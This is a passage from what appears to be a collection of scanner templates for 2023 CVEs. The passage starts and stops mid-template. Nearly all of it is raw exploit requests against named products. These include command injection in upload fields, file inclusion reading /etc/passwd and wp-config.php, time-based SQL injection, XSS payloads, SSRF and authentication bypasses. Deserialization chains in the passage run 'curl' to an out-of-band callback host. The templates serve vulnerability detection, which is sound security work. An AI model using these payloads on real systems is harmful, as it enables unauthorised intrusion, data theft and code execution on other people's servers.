filename=\"{{filename}}.bmp\"\n\n/\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadPath\"\n\n/\"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../\"\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_x\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_width\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW\nContent-Disposition: form-data; name=\"uploadFile_height\"\n\n1\n------WebKitFormBoundary7MA4YWxkTrZu0gW--\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"fail\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: application/json\n\n{\"command\":\"cp\",\"option\":\"-f\",\"srcPath\":\"/{{filename}}_original.bmp\",\"destPath\":\"/{{filename}}.jsp\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"errorCode\",\"errorMessage\",\"data\",\"success\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /simpleeditor/{{filename}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-37474","info":{"name":"Copyparty <= 1.8.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5089","info":{"name":"Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?gf_page=randomstring"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["%2F%3Fgf_page%3Drandomstring&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2023-0676","info":{"name":"phpIPAM 1.5.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{BaseURL}}/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator\n\nwsize=50000&delay=<script>alert(document.domain)</script>&fsize=1024\n"],"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Login successful\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(content_type_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0159","info":{"name":"Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success\",\"message\":\"Items are loaded\",\"data\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47218","info":{"name":"QNAP QTS and QuTS Hero  - OS Command Injection","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=\"avssqwfz\"\n\n--avssqwfz\nContent-Disposition: form-data; xxpcscma=\"field2\"; zczqildp=\"{{cmd}}\"\nContent-Type: text/plain\n\nskfqduny\n--avssqwfz\u2013\n","POST /cgi-bin/quick/{{file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1, \"code\\\": 200\", \"full_path_filename success\")","contains_all(body_2, \"uid=\", \"gid=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-28665","info":{"name":"Woo Bulk Price Update <2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=techno_get_products&page=<svg%20onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<svg onload=alert(document.domain)>\")","contains(body_2, \"pagination\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2023-41597","info":{"name":"EyouCms v1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["eyoucms","ey_fleshVerify"],"condition":"or","internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"critical"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44812","info":{"name":"mooSocial v.3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"body","words":["mooSocial"],"internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-40752","info":{"name":"PHPJabbers Make an Offer Widget v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/index.php?controller=pjAdmin&action=%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=prompt(document.domain)>","didn't exists"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert('document.domain')>","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-39002","info":{"name":"OPNsense - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1\n","GET /system_certmanager.php?act=%22%3E%3Csvg/onload=alert(document.domain)%3E&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><svg/onload=alert(window.origin)> \"/>"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"para","part":"body","group":1,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true},{"type":"regex","name":"value","part":"body","group":2,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-4547","info":{"name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331\"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB","{{BaseURL}}/search?filter[brandid]=vnxjb\"><script>alert(document.cookie)</script>bvu51"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["100-1331\"><script>alert(document.cookie)</script>","><script>alert(document.cookie)</script>bvu51"],"condition":"or"},{"type":"word","part":"body","words":["<table class=\"products-nav\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3188","info":{"name":"Owncast - Server Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/remotefollow HTTP/1.1\nHost: {{Hostname}}\n\n{\"account\":\"a@{{interactsh-url}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["success\":","message\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-6989","info":{"name":"Shield Security WP Plugin <= 18.5.9 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"dashboard_shield\"","\"shield_action\"","\"search_shield\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6065","info":{"name":"Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Website Malware Scan Report","Scanned Website","Scan type"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-5558","info":{"name":"LearnPress < 4.2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["/wp-content/plugins/learnpress"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"path":["?param=value%22%27%3Balert(document.domain)%3C!--","?param=value%22%27%3Balert(document.domain)%3Bb=%27","?%27-alert(%60XSS%60)-%27=a","instructors/?param=value%26%23x3C%3B%2Fscript%26%23x3E%3B%26%23x3C%3Bscript%26%23x3E%3Balert%26%23x60%3Bdocument.domain%26%23x60%3B%26%23x3C%3B%2Fscript%26%23x3E%3B%0A"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"';alert(document.domain)<!--","\"';alert(document.domain);b='","'-alert(`XSS`)-'=a","</script><script>alert`document.domain`</script>"],"condition":"or"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33405","info":{"name":"BlogEngine CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/default.aspx?years=http://oast.pro"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-37728","info":{"name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27","{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(header, \"IceWarp\") || contains(body, \"IceWarp WebClient\")","contains(body, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-36347","info":{"name":"POS Codekop v2.0 - Broken Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/excel.php","{{BaseURL}}/pos-kasir-php/excel.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Document"]},{"type":"word","part":"header","words":["application/vnd.ms-excel"]}]}]},{"id":"CVE-2023-43373","info":{"name":"Hoteldruid v3.0.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"hoteldruid\")"],"internal":true}]},{"raw":["POST /interconnessioni.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"anno\"\n\n2023\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"id_sessione\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"modifica_interconnessione\"\n\nSI\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"modifica_utente_agg\"\n\nSI\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"n_utente_agg\"\n\n1' AND (SELECT 3869 FROM (SELECT(SLEEP(7)))qSXB)-- QMbZ\n------------YWJkMTQzNDcw--\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-32315","info":{"name":"Openfire Administration Console - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache","java","openfire","jivesoftware"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36284","info":{"name":"QloApps 1.6.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["QloApps"],"case-insensitive":true}]},{"raw":["@timeout: 20s\nGET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"<span>Guest Information\")"],"condition":"and"}]}]},{"id":"CVE-2023-34756","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body_2, 'Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-33629","info":{"name":"H3C Magic R300-2100M - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goform/aspForm HTTP/1.1\nHost: {{Hostname}}\n\nCMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/{{filename}});\n","GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(body_1, 'do_cmd.asp')","status_code_2 == 200","contains_all(body_2, 'www', 'www_multi')"],"condition":"and"}]}]},{"id":"CVE-2023-6634","info":{"name":"LearnPress < 4.2.5.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"{{randstr}}\" HTTP/1.1\nHost: {{Hostname}}\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args=\"O%3a13%3a\\u0022WP_HTML_Token\\u0022%3a2%3a{s%3a13%3a\\u0022bookmark_name\\u0022%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3bs%3a10%3a\\u0022on_destroy\\u0022%3bs%3a6%3a\\u0022system\\u0022%3b}\" HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\":\"LP_Helper\",\"method\":\"maybe_unserialize\"}&args=\"O%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bO%3a13%3a\\u0022WP_Block_List\\u0022%3a2%3a{s%3a6%3a\\u0022blocks\\u0022%3ba%3a1%3a{s%3a4%3a\\u0022Name\\u0022%3ba%3a1%3a{s%3a9%3a\\u0022blockName\\u0022%3bs%3a12%3a\\u0022Parent+Theme\\u0022%3b}}s%3a8%3a\\u0022registry\\u0022%3bO%3a22%3a\\u0022WP_Block_Type_Registry\\u0022%3a1%3a{s%3a22%3a\\u0022registered_block_types\\u0022%3bO%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bN%3bs%3a6%3a\\u0022parent\\u0022%3bO%3a22%3a\\u0022WpOrg\\\\Requests\\\\Session\\u0022%3a3%3a{s%3a3%3a\\u0022url\\u0022%3bs%3a10%3a\\u0022http%3a//p%3a0\\u0022%3bs%3a7%3a\\u0022headers\\u0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3b}s%3a7%3a\\u0022options\\u0022%3ba%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a23%3a\\u0022requests.before_request\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a15%3a\\u0022http%3a//p%3a0/Name\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\\u0022system\\u0022%3b}}}}i%3a1%3bs%3a8%3a\\u0022dispatch\\u0022%3b}}}}}}}}}}s%3a6%3a\\u0022parent\\u0022%3bN%3b}\" HTTP/1.1\nHost: {{Hostname}}\n\n"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_any(interactsh_protocol, 'http', 'dns')","contains(body, 'Error: data content invalid!')","contains(body_1, '<pre>{{randstr}}</pre>') ","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-41892","info":{"name":"CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n"],"matchers":[{"type":"word","words":["PHP Credits","PHP Group","CraftCMS"],"condition":"and","case-insensitive":true}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43795","info":{"name":"GeoServer WPS - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<wps:Execute version=\"1.0.0\" service=\"WPS\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n  xmlns=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:wfs=\"http://www.opengis.net/wfs\"\n  xmlns:wps=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n  xmlns:gml=\"http://www.opengis.net/gml\"\n  xmlns:ogc=\"http://www.opengis.net/ogc\"\n  xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\"\n  xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n        xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n  <ows:Identifier>JTS:area</ows:Identifier>\n  <wps:DataInputs>\n    <wps:Input>\n      <ows:Identifier>geom</ows:Identifier>\n      <wps:Reference mimeType=\"application/json\" xlink:href=\"https://{{oast}}\" method=\"GET\">\n        <wps:Header key=\"{{string}}\" value=\"{{value}}\"/>\n      </wps:Reference>\n    </wps:Input>\n  </wps:DataInputs>\n  <wps:ResponseForm>\n    <wps:RawDataOutput>\n      <ows:Identifier>result</ows:Identifier>\n    </wps:RawDataOutput>\n  </wps:ResponseForm>\n</wps:Execute>\n"],"payloads":{"path":["/wms","/geoserver/wms"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-44353","info":{"name":"Adobe ColdFusion WDDX Deserialization Gadgets","severity":"critical"},"requests":[{"raw":["POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>\n","POST 